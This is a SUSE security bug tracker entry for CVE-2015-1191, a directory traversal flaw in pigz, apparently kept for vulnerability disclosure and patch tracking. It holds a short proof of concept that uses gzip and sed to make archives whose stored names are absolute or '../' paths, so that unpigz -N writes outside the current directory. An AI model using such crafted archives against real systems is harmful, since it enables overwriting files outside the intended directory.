Bug 913627 (CVE-2015-1191) - VUL-0: CVE-2015-1191: pigz: directory traversal while decompressing a file with restoring file name
Summary: VUL-0: CVE-2015-1191: pigz: directory traversal while decompressing a file w...
Status: RESOLVED FIXED
Alias: CVE-2015-1191
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Deadline: 2015-02-27
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/112761/
Whiteboard: maint:released:sle11-sp2:61282 CVSSv2...
Keywords:
Depends on:
Blocks:
 
Reported: 2015-01-19 08:55 UTC by Victor Pereira
Modified: 2016-03-06 03:12 UTC (History)
4 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Victor Pereira 2015-01-19 08:55:39 UTC
CVE-2015-1191

pigz is susceptible to directory traversal vulnerabilities. While 
decompressing a file with restoring file name, it (unlike gzip) will 
happily use absolute and relative paths taken from the input. This can 
be exploited by a malicious archive to write files outside the current 
directory.

1. Absolute path.

A sample could be prepared in following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel



References:
https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f (fix)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1191
http://seclists.org/oss-sec/2015/q1/170
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1191.html
Comment 1 Swamp Workflow Management 2015-01-19 23:00:46 UTC
bugbot adjusting priority
Comment 4 Swamp Workflow Management 2015-02-13 09:11:22 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2015-02-27.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/60669
Comment 6 Benjamin Brunner 2015-03-04 12:42:34 UTC
Alex, any news here? The due date for submission was 2015-02-27.

TIA.
Comment 12 Swamp Workflow Management 2015-04-07 16:05:27 UTC
SUSE-SU-2015:0670-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
SUSE Linux Enterprise Server 12 (src):    pigz-2.3-5.1
SUSE Linux Enterprise Desktop 12 (src):    pigz-2.3-5.1
Comment 13 Swamp Workflow Management 2015-04-13 18:05:02 UTC
SUSE-SU-2015:0716-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
SUSE Studio Onsite 1.3 (src):    pigz-2.1.6-0.12.1
Comment 14 Andreas Stieger 2016-03-03 12:34:15 UTC
openSUSE Leap 42.1 Update already imported from SLE.

Copied 13.2 and 13.1 submissions.
Comment 15 Bernhard Wiedemann 2016-03-03 13:00:11 UTC
This is an autogenerated message for OBS integration:
This bug (913627) was mentioned in
https://build.opensuse.org/request/show/365313 13.2 / pigz
Comment 16 Andreas Stieger 2016-03-04 08:21:19 UTC
release 13.2
Comment 17 Swamp Workflow Management 2016-03-04 12:11:45 UTC
openSUSE-SU-2016:0650-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
openSUSE 13.2 (src):    pigz-2.3-4.3.1
Comment 18 Swamp Workflow Management 2016-03-06 03:12:15 UTC
openSUSE-SU-2016:0662-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 913627
CVE References: CVE-2015-1191
Sources used:
openSUSE 13.1 (src):    pigz-2.3-2.3.1